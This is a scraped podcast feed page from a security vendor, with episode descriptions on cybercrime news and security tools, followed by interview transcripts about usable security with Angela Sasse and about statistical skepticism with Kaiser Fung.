Join us for State of Cybercrime, where experts discuss the latest trends and developments in the world of cybercrime and provide insights into how organizations can protect themselves from potential threats.
Sponsored by Varonis
php/* */ ?>
Join us for State of Cybercrime, where experts discuss the latest trends and developments in the world of cybercrime and provide insights into how organizations can protect themselves from potential threats.
Sponsored by Varonis
DeepSeek, the Chinese AI startup dominating news feeds, has experienced exponential growth while wiping almost $1 trillion off the U.S. stock market. However, the model's rise has now been overshadowed by a surge of malicious attacks.
On this special episode of State of Cybercrime, Matt and David explore the rise of this innovative AI tool, the subsequent attacks, and the potential vulnerabilities of the AI model. DeepSeek won’t be the last shadow AI app you have to worry about.
So what steps can you take to ensure you can discover and stop shadow AI apps from inhaling your corporate secrets? Read our latest blog for more insights and immediate actions you can take to protect your organization from shadow AI.
📌 DeepSeek Discovery: How to Find and Stop Shadow AI: https://www.varonis.com/blog/deepseek
On this episode of State of Cybercrime, Matt and David cover the most recent Chinese state-sponsored APT attack by Silk Typhoon on the U.S. Treasury Department. They discuss how the attackers used a remote support tool to enable unauthorized access to Treasury workstations and unclassified documents. They also dive into some of the most pressing cybersecurity news and recent breaches you should know about.
In this episode, Matt and David delve into the evolving story of Salt Typhoon, a Chinese state-sponsored group, and their use of the innovative 'GhostSpider' backdoor to infiltrate telecommunication service providers. This sophisticated and far-reaching cyberattack, which is much larger than previously understood, has compromised sensitive cellular logs and data from government entities, telecom providers, and millions of Americans. Don’t miss this opportunity to stay informed and keep your organization safe!
Russia's APT29, a.k.a "Midnight Blizzard," is arguably one of the world's most notorious threat actors. You might recall their involvement in the 2019 SolarWinds attack where they operated under the alias "Cozy Bear."
The group is back with more relentless attacks—breaching cloud credentials and targeting over 100 organizations worldwide.
In this episode of State of Cybercrime, Matt and David dive into some of the hottest cybersecurity news and recent breaches, including Midnight Blizzard. Discover how these sophisticated attacks are happening and what you can do to stay a step ahead.
Hosts Matt Radolec and David Gibson explain how cybercriminals are manipulating AI models like ChatGPT to plant false memories and steal data, along with other cybercrime-related stories like Salt Typhoon.
Salt Typhoon is a Chinese hacking group that has reportedly breached multiple key U.S. broadband providers, raising significant concerns about the security of sensitive communications data.
The hackers may have had access to these networks for months, raising significant concerns about the security of sensitive communications data.
More from Varonis ⬇️
Visit our website: https://www.varonis.com
LinkedIn: https://www.linkedin.com/company/varonis
X/Twitter: https://twitter.com/varonis
Instagram: https://www.instagram.com/varonislife/
#Cybercrime #DataSecurity
The North Korean Lazarus group is running multiple high-risk campaigns: one exploiting Windows and another installing malware through fraudulent blockchain job offers.
State of Cybercrime hosts Matt Radolec and David Gibson discuss the various APT groups, including a prolific ransomware-as-a-service operation and a Chinese cyber espionage gang known as Volt Typhoon, and other vulnerable vulnerabilities in this episode, including:
+ Lazarus FudModule rootkit attacks and the concurrent Eager Crypto Beavers campaign
+ RansomHub attacks on Halliburton, Change Healthcare, and hundreds more
+ Large-scale extortion of AWS environments through exposed ENV files
+ Hundreds of exposed servers from Volt Typhoon’s ISP targeting
+ Payment gateway breach of over 1.7 million credit card owners
Matt Radolec and David Gibson discuss how an unknown attacker recently exploited a vulnerability in Proofpoint’s email routing system, allowing them to bypass security measures and send millions of spoofed emails on behalf of major companies.
The co-hosts also cover:
+ The North Korean threat actor hired using AI
+ The biggest ransomware payment ever made
+ How X is training its Grok AI LLM with your posts
+ The EU’s groundbreaking AI act
+ How anyone can access deleted and private repositories on GitHub
+ Updates on AMD's silicon-level "SinkClose" processor flaw
In this episode of State of Cybercrime, co-hosts Matthew Radolec and David Gibson dive into the details around LockBit, and cover other news including:
+ The MOVEit authentication bypass flaw
+ Developments in the Polyfill supply chain attack affecting millions of websites
+ Updates on the targeted campaign against Snowflake
+A massive insider breach of a Pennsylvania healthcare system
+ Two new attack methods threat actors are adopting
+ The new OpenSSH unauthenticated RCE vuln that gives root privileges to + Linux systems
Snowflake, a cloud storage platform used by some of the largest companies in the world, is investigating a targeted attack on its users who lack multifactor authentication.
Join Matt Radolec and David Gibson for an episode of State of Cybercrime in which we discuss the increased attacks on Snowflake customers and share our five-point checklist for ensuring your cloud databases are properly configured and monitored.
WE’LL ALSO COVER:
...and more! More from Varonis
⬇️ Visit our website: https://www.varonis.com
LinkedIn: / varonis
X/Twitter: / varonis
Instagram: / varonislife
A new data leak of more than 500 documents published to GitHub reveals the big business behind China’s state-sponsored hacking groups — from top-secret surveillance tools to details of offensive cyber ops carried out on behalf of the Chinese government.
Join Matt and David for a special State of Cybercrime, which dives into China's espionage campaigns and complex network of resources.
We’ll also discuss:
- The massive cyberattack on Change Healthcare
- Zyndicate’s successful hack of the Danish government
- Apple Vision Pro’s launch day woes
- Multiple developments in AI risk/regulation
- How LockBit remains active after their servers and domains were seized
- And more!
CISA issued an emergency directive to mitigate Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities after learning of malware targeting the software company, allowing unauthenticated threat actors to access Ivanti VPNs and steal sensitive data.
CISA is requiring all federal agencies to disconnect from affected Ivanti products by EOD February 2, 2024. The directive also warned that attackers had bypassed workarounds for current resolutions and detection methods.
Join Matt, David, and Dvir to learn more about the Ivanti vuln and other cyber threats.
OTHER BREAKING STORIES WE'LL COVER:
• The latest ChatGPT news
• Deepfakes… err breachfakes
• Cloudflare's breach by suspected nation-state attacker
• "Frog4Shell" spreading malware inside your network
And more!
More from Varonis ⬇️ Visit our website: https://www.varonis.com LinkedIn: https://www.linkedin.com/company/varonis X/Twitter: https://twitter.com/varonis Instagram: https://www.instagram.com/varonislife/
Enjoy our first State of Cybercrime episode of 2024 as Matt Radolec and David Gibson cover:
Mentioned in this episode:
In this episode of 'State of Cybercrime', the hosts discuss various topics including an executive order on Artificial Intelligence(AI) by President Biden promoting a balance between AI safety, security, privacy and innovation, as well as implications for American leadership in AI. They covered the disruptive Mozi Botnet, SolarWinds CISO's challenged with fraud and difficulties experienced by IT administrators patching vulnerabilities. They also touched on the continuous exploitations of Citrix and Confluence, and the emergence of cybercrime ring, Hunters International. An exploration of AI potentials and the need for legislation to prevent nefarious uses are also discussed.
00:30 Introduction and Welcome
01:04 Agenda for the Episode
02:03 Good News: Dismantling of Pirates
05:46 Good News: Disruption of Mozi Botnet
07:16 Danger Zone: SEC Charges SolarWinds CISO
12:25 Vulnerable Vulnerabilities: Citrix Vulnerabilities
15:34 Vulnerable Vulnerabilities: Confluence Vulnerability
17:02 AI Vey: President Biden's Executive Order on AI
18:51 AI Vey: UK Summit on AI
22:55 Conclusion
Few breaches have drawn as much social media fervor as the recent 23andMe incident, in which the genomics company was victim to a massive credential stuffing attack that leveraged leaked and reused passwords to target accounts without MFA.
What differentiates this attack from others is that 23andMe itself was not breached, but an entire wave of its users was targeted individually. There are claims that these profiles — including genetic and geographic ancestry data — are available on hacking forums, but the legitimacy of those claims is still being investigated.
Join the State of Cybercrime team, Matt, David, and Dvir, to learn about the numerous tools hackers use for cred stuffing, examples of when these tactics have been used in organizational attacks, and what you can do to protect yourself.
Join Matt Radolec and David Gibson for this episode of the State of Cybercrime, recording from Black Hat 2023, as they cover the latest threats you need to know about. Also be sure to check out our webinar, New SEC Cyber Rules: Action Plan for CISOs and CFOs on Tuesday, August 22 | 12 p.m. ET. Link here: https://info.varonis.com/en/webinar/what-the-new-sec-requirements-mean-for-your-org-2023-08-22
The Storm-0558 incident has proven to be even more widespread than initially reported. While Microsoft originally stated that only Outlook.com and Exchange Online were affected, Wiz Research has discovered that the compromised signing key may have allowed the cybercriminal group to forge access tokens for SharePoint, Teams, OneDrive, and every other app that supports logging in with Microsoft credits. Watch our team of experts during this State of Cybercrime episode that assesses the reach of this incident and teaches you what you should do to make sure you are safe and secure.
A Microsoft zero-day vulnerability has allowed hacking group Storm-0558 to forge Azure AD authentication tokens, and breach organizations — including U.S. government agencies — in the past week. Watch this State of Cybercrime episode to hear our experts break down how this attack happened, see the discoveries made by the Varonis Threat Labs team, and learn what you can do to make sure your data is safe and secure.
Across the globe, CL0P ransomware group is extorting hundreds of organizations after exploiting an unknown SQL injection vulnerability in file transfer service MOVEit. The victims need to contact the ransomware group by June 14 or their stolen data will be published publicly on the group’s extortion site. Join Matt Radolec, David Gibson, and special guest Dvir Sason to learn more about how the ransomware group exploited the critical flaw in the transfer application, which they were likely experimenting with since 2021.
In the wake of the U.S. defense leak, the Pentagon CIO has given a one-week deadline for all defense agencies to ensure compliance with DOD information security protocols. But what does that actually mean? Join Matt, David, and Varonis Team Lead Engineer for U.S. Public Sector Trevor Brenn for a State of Cybercrime episode that breaks down what the DOD is demanding from its agencies and how this influences the future of information security within government.
Links mentioned in this episode:
• Video course (free) on building an IR plan: https://info.varonis.com/thank-you/course/cyber-incident-response
• Blog post about LockBit: https://www.varonis.com/blog/anatomy-of-a-ransomware-attack
• Blog post about HardBit: https://www.varonis.com/blog/hardbit-2.0-ransomware
Recent cyberattacks, zero-days, and APTs have positioned China as a cybersecurity adversary. Join Matt Radolec and David Gibson for a special State of Cybercrime episode, during which the two will discuss the recent wave of stealth Chinese cyberattacks against U.S. private networks and what this means for U.S.-Chinese relations in 2023. Matt and David also cover: -The congressional TikTok hearing surrounding data privacy concerns as a byproduct of Chinese ownership -The recent Facebook accounts hacked by the ChatGPT Chrome extension -Our “good news” segment: the shutdown of the notorious Breached hacking forum -The 55 zero-days that were weaponized in 2022
Still reeling from last year’s data breach, password manager LastPass recently shared that the same attacker who targeted the organization in August has struck again, this time using stolen data to hack an employee’s home computer.
Join Matt Radolec and David Gibson as they walk you through the multi-stage attack, revisiting the discussion of the initial intrusion and outlining how that stolen data was weaponized months later to breach the company’s vault.
Matt and David will also spotlight recent vulnerabilities that you should keep an eye on and discuss the meteoric rise of wiperware.
We cover:
Links mentioned in the show:
LockBit ransomware, what you need to know
VMware ESXi in the Line of Ransomware Fire
Visit our website and sign up for emails to be notified of new live episodes.
Watch the podcast on our Youtube channel.
We're back! Kind of. We'll soon relaunch this podcast and wanted to give you a quick update on what's happening.
Thanks for watching the first season of the security tools podcast! Want more? We're live on the SecurityFwd YouTube channel twice per week!
Come hack with us or watch any of the previously recorded streams.
Nick's Twitter: https://twitter.com/nickgodshall
Kody's Twitter: https://twitter.com/kodykinzie
Varonis Cyber Attack Workshop: https://www.varonis.com/cyber-workshop/
Canary Tokens - https://canarytokens.org/generate
Learn more about canaries - https://canary.tools/
Adrian's Twitter - https://twitter.com/sawaba
Apologies for the scratchy mic!
Vic's Blog on Defeating Facial Recognition: https://vicharkness.co.uk/2019/02/01/the-art-of-defeating-facial-detection-systems-part-two-the-art-communitys-efforts/
Check out Vic's Twitter: https://twitter.com/VicHarkness
Kody's Twitter: https://twitter.com/kodykinzie
Varonis Cyber Attack Workshop: https://www.varonis.com/cyber-workshop/
Joshua's Twitter: https://twitter.com/jbrowder1
DoNotPay's website: https://donotpay.com
Sue Phone Scammers: https://donotpay.com/learn/robocall-compensation
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Mathy's Website: https://www.mathyvanhoef.com
Mathy's YouTube Channel: https://twitter.com/vanhoefm
Mathy's Paper on Defeating MAC Address Randomization: https://papers.mathyvanhoef.com/asiaccs2016.pdf
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Seytonic's Malduino Website: https://maltronics.com/
Seytonic's Website: https://seytonic.com/
Seytonic's YouTube Channel: https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Alex's Website: http://alexlynd.com
Check out the Creep Detector Video: https://www.youtube.com/watch?v=ug9dHwm3h0s
Alex Lynd's Twitter: https://twitter.com/alexlynd
Check out Alex's GitHub: https://github.com/AlexLynd
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Check out Maltego: https://www.maltego.com/
Maltego Twitter: https://twitter.com/maltegohq
Check out Maltego use cases: https://docs.maltego.com/support/solutions/articles/15000012022-use-cases
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Check out Objective-See: https://objective-see.com/
Objective-See Twitter: https://twitter.com/objective_see
Objective-See Patreon: https://www.patreon.com/objective_see
While In Russia: Patrick's RSA talk on hacking journalists -
Patrick's Twitter: https://twitter.com/patrickwardle
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
Stefan's Site with links to all of his projects: https://spacehuhn.io/
Twitter: https://twitter.com/spacehuhn
YouTube: https://www.youtube.com/channel/UCFmjA6dnjv-phqrFACyI8tw
An overview of the ESP8266 https://www.espressif.com/en/products/hardware/esp8266ex/overview
Stefan's Github https://github.com/spacehuhn
ESP8266 Deauther 2.0 https://github.com/spacehuhn/esp8266_deauther
WiFi Duck - Wireless injection attack Platform
https://github.com/spacehuhn/WiFiDuck
WiFi Satellite - monitoring and logging 2.4GHz WiFi Traffic
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
A honeypot is a tool that acts as bait, luring an attacker into revealing themselves by presenting a seemingly juicy target. In our first Security Tools podcast, we explore a free tool called Grabify that can gather information about scammers or attackers when they click on a honeypot tracking link.
https://twitter.com/grabifydotlink
This podcast is brought to you by Varonis, if you'd like to learn more check out the Cyber Attack Lab at https://www.varonis.com/cyber-workshop/
We wanted you to be the first to know that next week; we will be back in this same feed with a new security podcast from Varonis.
The new Security Tools podcast will keep you up to date with the most exciting and useful tools the Infosec community has to offer.
Join us on the new show to hear from the researchers and hackers behind tools like Grabify, a link-based Honeypot service that unmasks scammers leveraging the same web tracking tactics used by most modern websites. We’ll find out why it’s so hard to stay anonymous online and show you how to use the power of tracking links to find the real location of an online scammer.
See you next week.
Summer is approaching, and of course, that’s when we feel the most heat. However, for cybersecurity managers, they feel the heat all the time. They must be right every time because cybercriminals only have to be right once. So summer can potentially feel like it’s year-round for cybersecurity pros and it can cause job burnout.
Another problem that managers face is the potential ineffectualness of cybersecurity awareness training. Learning and sharing interesting security information in a class is really wonderful and expansive for a user’s mind. However, if it doesn’t change a user’s behavior and he continues to click on links he shouldn't be clicking on, training might not be as helpful as it claims to be.
Other articles discussed:
Panelists: Cindy Ng, Mike Buckbee, Kris Keyser, Kilian Englert
Searching a traveler’s phone or laptop is not an extension of a search made on a piece of luggage. As former commissioner of Ontario Ann Cavoukian said, “Your smartphone and other digital devices contain the most intimate details of your life: financial and health records.”
In general, it’s also dangerous to connect laws made in accordance with the physical world to the digital space. But even with GDPR that’s aimed to protect consumer data, the law hasn’t taken action against any major technology firms such as Google or Facebook.
It seems our relationship with technology might get worse before it gets better.
Other articles discussed:
Lately, we’ve been hearing more from security experts who are urging IT pros to stop scapegoating users as the primary reason for not achieving security nirvana. After covering this controversy on a recent episode of the Inside Out Security Show, I thought it was worth having an in-depth conversation with an expert.
So, I contacted Angela Sasse, Professor of Human-Centred Technology in the Department of Computer Science at University College London, UK. Over the past 15 years, she has been researching the human-centered aspects of security, privacy, identity and trust. In 2015, for her innovative work, she was awarded the Fellowship of the Royal Academy of Engineering(FREng) for being one of the best and brightest engineer and technologist in the UK.
In part one of my interview with Professor Angela Sasse, we cover the challenges that CISOs have in managing risk while finding a way to understand what’s being asked of the user. And more importantly, why improving the usability of security can positively impact an organization’s profits.
For her exceptional work in 2015, Professor Angela Sasse was awarded the Fellowship of the Royal Academy of Engineering as being one of the best and brightest engineers and technologists in the UK.
I think what you're doing is multilayered, multifaceted, and you're targeting two very different fields where you're trying to think about how to design innovative technologies that are functional while driving the bottom line. So that's B2B and then also improve the well-being of individuals and society and that's B2C and the strategies of those two things are very different. So maybe to just peel the layers back to start from the beginning, your research focuses on human usability of security and perhaps privacy too. Maybe it might be helpful to define what usability encompasses.
Angela Sasse: Okay. So, usability, there's a traditional definition, there's an, you know, International Standards Organization definition of it, and it says,"Usability is if a specified user group can use the mechanism to achieve their goals in a specified context of use." And that actually makes it really quite, quite complex, because what it's really saying is there isn't a sort of, like, hard-line measure of what's usable and what isn't. It's about the fit, how well it fits the person that's using it and the purpose they're using it for in the situation that they're using it.
Cindy Ng: Usability is more about the user, the human and not necessarily the technology, it's, after all, just a tool. And we have to figure out a way to fit usability into the technology we're using.
Angela Sasse: Yes, of course, and what it amounts to is that, of course, it's not economic. It wouldn't be economically possible to get a perfect fit for a 120 different types of interactions in situations that you do. What we generally do is we use four or five different forms of interaction, you know, that work well enough across the whole range of interactions that we do. So their locally optimal and globally optimal, so you could make a super good fit for different situations. But if you don't want to know about 120 different ways of doing something, so globally optimal is to have a limited set of interactions and symbols and things that you're dealing with when you're working with technology.
So, security, however, one of the things that a lot of people overlook when it comes to security and usability is that from the user's point of view, security is always what usability people call a secondary task or enabling task. So this is a task I have to do to get to the thing I really want to do, and so the kind of tolerance or acceptance that people have for delays or difficulty is even less than with their sort of primary interactions.
Cindy Ng: It's like a chore. For instance, an example would be I need to download an app, perhaps, in order to register for something.
Angela Sasse: Yeah, and so what you want to do is, you know, you want to use the app for a particular purpose, and then if you basically have...if the user perceives that in order to be able to use the app, you know, all the stuff you have to do to get to that point is too much of a hurdle, then most of them would just turn around and say, "It's not worth it. I'm not going ahead."
Cindy Ng: When it comes to the security aspect how does a CISO or an IT security admin decide that users are dangerous, and that if they only had the same knowledge that I have, that they would behave differently. Where does downloading the app or using a website intersect with the jobs of what a CISO does?
Angela Sasse: CISO is trying to manage the risks, and some of the risks might affect the individual employee or individual customer as well. But other risks are really risks to the organization, and if something went wrong it wouldn't directly affect the employee or the customer. But I think what, a CISO or SysAdmin, I would say to them is, "You've got to understand what you are asking the user to do. You have to accept that you're a security specialist, and you are focused on delivering security, but you're the only person in the organization for whom security is a primary task.
For everybody else, it's a secondary task. It's a hurdle they have to jump over in order to do what they've been trained for, what they are good at, what they're paid to do. And so it's in your best interest to make that hurdle as small as possible. You should effectively manage the risk, but you've got to find ways of doing it that no one really bothers, where you're really taking as little time and effort away from the people who have to do it. Because otherwise you end up eating all the profits. Right?"
Angela Sasse: The more effort you're basically taking away from the main activity that people do, the more you're reducing the profits of the organization.
Cindy Ng: You've done the research, and you're presenting them and you're interacting with CISOs and SysAdmins and how has the mindset evolved and also some of the push back. Can you provide some examples?
Angela Sasse: Early on a lot of of the push back was really, well, people should do what they are told, and the other main push back is, "So, you're telling me, this is difficult or effortful to do for people. Can we give them some training?" The real push back is that they don't want to think about changing, making changes to the technology and to the way they are managing the risks. So their first thought is always, "How can I make people do what I want them to do." And so the very first big study that Adams and I did, we then subsequently...it's published in the paper, "Users Are Not the Enemy."
So, this was a very big telecommunication company and when we said to them, "Look, your staff have between 16 and 64 different passwords, six digit pins and eight character passwords, complex, and you're telling them they have to have a different one and they can't write it down. And they were also expiring them every 30 days, so they had to change them every 30 days.
And basically I said, "Nobody can do this." Then they said, "Okay, could they do it if we gave them some extra training?" And my response was, "Yes, and that would look like this, all your employees have to go on a one-year course to become memory athletes. Even when they come back, they're going to spend half an hour a day doing the memory techniques that you need to do in order to be able to recall all this stuff."
And if you think about it that way, it's just absurd that rather than making changes to the password policy or providing easier to use authentication mechanism. Sometimes what's equally ridiculous is, so, like, "Can you give me a psychology test so I can screen out the people who are not compliant so that I can recruit people that are naturally compliant."
That's bizarre. You need to recruit people who are good at the jobs that your business relies on, good at the stuff your business delivers. If you just recruit compliant and risk averse people, you're gonna go bust. So, you sometimes you have to really show the absurdity of the natural thinking that there is. There is this initial resistance to go, like, "I don't really want to change the way how I think about security, and I don't want to change the mechanisms I use."
Cindy Ng: I think a lot of the CISOs and the SysAdmins are restricted too by the tools and the software, and they feel like they're confined and have to work within a framework, because their job is really technical. It's always about are you able to secure my network first over the human aspect of it. And I really like what you said about how phishing scam attackers understand more of the human element of security than security designers have. Can you elaborate more on that?
Angela Sasse: I think... So, I'm working with some of the government here in the UK, with those government agencies that are responsible for security and for advising companies about security. And I think it's very interesting to see that they have concluded that CISOs need, and security practitioners, that they need to develop their soft skills and that they need to engage. They need to listen more, and they need to also learn how to...once they have listened, you know, and understand how they can provide a fit, then how they can persuade people of the need for change.
You know, because part of the whole problem is if you reconfigure the mechanisms, and they're now easier to use without people still need to change their behavior. They still need to move on from existing habit to the new ones, and that can be a bit of a blocker for change, and you need to persuade people to embark on this journey of changing their existing habits. And for that you need soft skills, and you need to persuade them that I have now made it as easy as possible to use. Now your part, your responsibility is to change your existing habit towards this new secure one, you know, which is feasible to do. And it's not particularly onerous, but you need to work through that process of changing, learning a new habit.
Cindy Ng: How long do they want it to be? How long does it actually take, and how has their mindset evolved?
Angela Sasse: Most of them now realize that their role is really is to be a cheerleader for security, not, you know, the kind of the old school that they are some sort of gatekeeper who can stop everybody. So most of them now do realize.
Cindy Ng: When did that happen?
Angela Sasse: I think it's happened...it's only very recent. For the majority of them it happened in the last, maybe, four or five years. Some still haven't gotten there, but quite a few of them, and, you know, I've seen some very...I mean, if I go to Infosec for instance to meet people there who've really done a very good job.
And I think, actually, say if you, for instance, look at the born digital companies. I think they generally do...they do very well. You know, if you look at Google, Amazon, Facebook, eBay, they've generally worked very hard to secure their business without...and they know that it would be a threat to their business if people couldn't use the security or found the security to be cumbersome. And I think they've actually done a good job, pretty good job, to look at how you can make it easier to use. So I think those companies are currently leading the charge.
But I've seen this happen in a couple of other... So, I think basically, other companies that have very big customer bases, you know, sort of experiences that they get with that that they realize that they have to make it easier for the customers to access services or use devices. Those lessons then also tend to filter through to how they are designing security for their own employees.
So, you know, if you look at mobile phone companies and the television companies, you know, cable and satellite TV companies, I think they've really internalized...so the people working there really have quite a modern outlook. I think next coming around the corner is the big software and technology development companies. They have started to...so companies like Microsoft have started to realize this as well.
Over the past few weeks, Kaiser Fung has given us some valuable pointers on understanding the big data stats we are assaulted with on a daily basis. To sum up, learn the context behind the stats — sources and biases — and know that the algorithms that crunch numbers may not have the answer to your problems.
In this third segment of our podcast, Kaiser points out all the ways the stats can trick us through its inherently random nature — variability in stats-speak.
Your third point is to have a nose for doctored statistics. And for me, it's kind of like…if you don't know what you don't know? Kind of like I was surprised to read in the school rankings chapter in Number Sense that different publications have different rules in ranking. And then I didn't know that like reporting low GPAs as not available, it's a magic trick that causes a median GPA to rise. And so if I didn't know this, I would just use any number in any of these publications and use it in my marketing. How do I cultivate a nose for doctored statistics?
Kaiser Fung: Well, I think...well, for a lot of people, I think it would involve like reading certain authors, certain people who specializes in this sort of stuff. I'm one of them but there are also others out there who have this sort of skepticism and they will point out how...you know, I mean I think it's all about figuring out how other people do it and then you can do it even to just follow the same types of logic. Often times, it involves sort of like, there are multiple stages to this. So there's the stage of can you smell something fishy? So it's sort of this awareness that, "Okay, do I want to believe this or not?"
And then there's the next stage of, do you...once you smell something, do you know where to look, how to look, how do you investigate it? So usually when you smell something that means that you have developed an alternative hypothesis or interpretation that is different from what the thing you're reading. So in sort of this scientific method, what we want to do at that point is to try to go out and find cooperating evidence. So then the question becomes do you have this notion of what kinds of things I could find that could help you decide whether you're right or whether the original person is right? And here the distinction is really around if you're more experienced, you might be able to know if I am able to find this information that will be sufficient for me to even validate this or to fortify that. So you don't necessarily go through the entire analysis. Maybe you just find a shortcut to get to a certain point.
And then the last stage is, that's the hardest to achieve and also not always necessary but it's sort of like okay if you no longer believe in what was published, how do you develop your alternative argument? So that requires a little more work and that's the kind of thing that I try to train my students to do. So often times when I set very open-ended type problems for them, you can see these people in different stages. Like there are people who don't recognize where the problems are, you know, just believe what they see. There are people who recognize the problems and able to diagnose what's wrong. Then there are ones that can diagnose what's wrong and they will have...you know, whether it's usually through looking at some other data or some other data points, they can decide, okay, instead of making the assumptions that the original people made which you no longer believe, I'm going to make a different set of assumptions. So like make this other set of assumptions, what would be the logical outcome of the analysis? So I think it's something that can be trained. It's just difficult in the classroom setting in our traditional sort of textbook lecture style. That type of stuff is very difficult to train.
Andy Green: Something you said about sort of being able to train ourselves. And one thing that, it comes up in your books a lot, is that a lot of us don't have the sense of variability in the data. We don't understand what that means or what it...if we were to sort of put it out on a bar chart, we don't have that picture in our mind. And one example that you talk about I think on a blog post in something as marketers, we do a lot is A/B testing. And so we'll look at, we'll do a comparison of changing one website slightly and then testing it and then noticing that maybe it does better, we think. And then when we roll it out, we find out it really doesn't make too much of a difference. So you talked about reasons why something might not scale up in an A/B test. I think you wrote about that for one of the blogs. I think it was Harvard Business Review,
Kaiser Fung: ...I'm not sure about whether we're saying the same things. I'm not quite exactly remembering what I wrote about there. But from an A/B testing perspective, I think there are lots of little things that people need to pay attention to because ultimately what you're trying to do is to come up with a result that is generalizable, right? So you can run your test in a period of time but in reality, you would like this effect to hold, I mean that you'll find anything over the next period of time.
Now, I think both in this case as well as what I just talked about before, one of the core concepts in statistics is not just understanding it's variability. Whatever number is put in front of you, it's just a, at the moment sort of measurement, right? It's sort of like if you measure your weight on the same scale it's going to fluctuate, morning, night, you know different days. But you don't have this notion that your weight has changed. But the actual measurement of the weight, even though if it's still the same weight, will be slightly different.
So that's the variability but the next phase is understanding that there are sources of variability. So there are many different reasons why things are variable. And I think that's sort of what we're getting into. So in the case of A/B testing, there are many different reasons why your results have been generalized. One very obvious example is that what we call the, we say that there's a drift in population. Meaning that especially websites, you know, a site changes over time. So even if you keep stable during the test, when you roll it forward it may have changed. And just a small change in the same part of the website could actually have a very large change in the type of people that comes to the page.
So I have done...in the past, I've done a lot of A/B testing around kind of what you call the conversion funnel in marketing. And this is particularly an issue if you...let's say you're testing on a page that is close to the end of the funnel. Now, people do that because that's the most impactful place because the conversion rates are much higher in those pages. But the problem is because it's at the end of many steps. Anything that changed in any of the prior steps, it's going to potentially change the types of people ended up on your conversion page.
So that's one reason why there are tests that test variability in the type of people coming to your page. Then even if the result worked during a test, it's not going to work later. But there's plenty of other things including something that people often times fail to recognize which is the whole basis of A/B testing is you are randomly placing people into more pockets. And the randomization, it's supposed to on average tell you that they are comparable and the same. But random while it will get you there almost all of the time but you can throw a coin 10 times and get 10 heads. But there's a possibility that there is something odd about that case.
So another problem is what is your particular test had this weird phenomenon? Now, in statistics, we account for that by putting error box around these things. But it still doesn't solve the problem that that particular sample was a very odd sample. And so one of the underlying assumptions of all the analysis in statistics is that you're not analyzing that rare sample. That rare sample is kind of treated as part of the outside of normal situation. So yeah, there are a lot of subtlety in how you would actually interpret these things. And so A/B testing is still one of the best ways of measuring something. But even there, there are lots of things that you can't tell.
I mean, I also wrote about the fact that sometimes it doesn't tell you...we'd like to say A/B testing gives you cause-effect analysis. It all depends on what you mean by cause-effect because even the most...for a typical example, like the red button and the green button, it's not caused by the color. It's like the color change did not cause anything. So there are some more intricate mechanisms there that if you really want to talk about cause, you wouldn't say color is a cause. Although in a particular way of interpreting this, you can say that the color is the cause.
Andy Green: Right, right.
Cindy Ng : It really just sounds like at every point you have to ask yourself, is this accurate? Is this the truth? It's a lot more work to get to the truth of the matter.
Kaiser Fung: Yes. So I think when people sell you the notion that somehow because of the volume of the data everything becomes easy, I think it's the opposite. I think that's one of the key points of the book. When you have more data, it actually requires a lot more work. And going back to the earlier point which is that when you have more data, the amount of potentially wrong analysis or coming to the wrong conclusion is exponentially larger. And a lot of it is because of the fact that most analysis, especially with data that is not experimental, it's not randomized, not controlled, you essentially you rely on a lot of assumptions. And when you rely a lot on assumptions, it's the proverbial thing about you can basically say whatever the hell you want with this data.
And so that's why I think it's really important for people when especially for those people who are not actually in this business of generating analysis, if you're in the business of consuming analysis, you really have to look out for yourself because you really could, in this day and age, could say whatever you want with the data that you have.
Cindy Ng: So be a skeptic, be paranoid.
Kaiser Fung: Well the nice thing is like when they're only talking about the colors of your bicycles and so on, you can probably just ignore and not do the work because it's not really that important to the problem. But on the other hand, when you...you know, in the other case that is ongoing which is the whole Tesla autopilot algorithm thing, right? Like in those cases and also when people are now getting into healthcare and all these other things where your potential...there's a life and death decision, then you really should pay more attention.
Cindy Ng: This is great. Do you have any kind of final thoughts in terms of Numbersense?
Kaiser Fung: Well, I'm about...I mean, this is a preview of a blog post that I'm going to put out probably this week. And I don't know if this works for you guys because this could be a bit more involved but so here's the situation. I mean, it's again that basically reinforces the point that you can easily get fooled by the data. So my TA and I were reviewing a data set that one of our students is using for their class projects. And this was basically some data about the revenue contributions of various customers and some characteristics of the customers. So we were basically trying to solve the problem of is there a way to use these characteristics to explain why the revenue contributions for different customers have gone up or down?
So we've spent a bit of time thinking about it and we eventually come up with a nice way of doing it. You know, it's not an obvious problem, so we have a nice way of doing it. We thought that actually produced pretty nice results. So then we met with the student and pretty much the first thing that we learned from this conversation is that, oh, because this is for proprietary data, all the revenue members were completely made up. Like there is some, this thing, formula or whatever that she used to generate the number.
So that's sort of the interesting sort of dynamic there. Because on the one hand, like obviously all of the work that we spent kind of put in creating this model and then the reason why we like the model is that it creates a nicely interpretable results. Like it actually makes sense, right? But it turns that yes, it makes sense in that imaginary world but it really doesn't have any impact on reality, right? So I think that's the...and then the other side of this which I kind of touch upon in my book too is well, if you were to just look at the methodology of what we did and the model that we built, you would say we did a really good work. Because we applied a good methodology, generate it, quick results.
So the method and the data and then your assumptions, I mean all these things play a role in this ecosystem. And I think that...so going back to what I was saying today, I mean it's the problem is all these data. I think we have not spent sufficient time to really think about what are the sources of the data, how believable is this data? And in this day and age, especially with marketing data, with online data and all that, like there's a lot of manipulation going on. There are lots of people who are creating this data for a purpose. Think about online reviews and all other things. So on the analysis side, we have really not faced up to this issue. We just basically take the data and we just analyze and we come up with models and we say things. But how much of any of those things would be refuted if we actually knew how the data was created?
Cindy Ng: That's a really good takeaway. You are working on many things, it sounds like. You're working on a blog, you teach. What else are you working on these days?
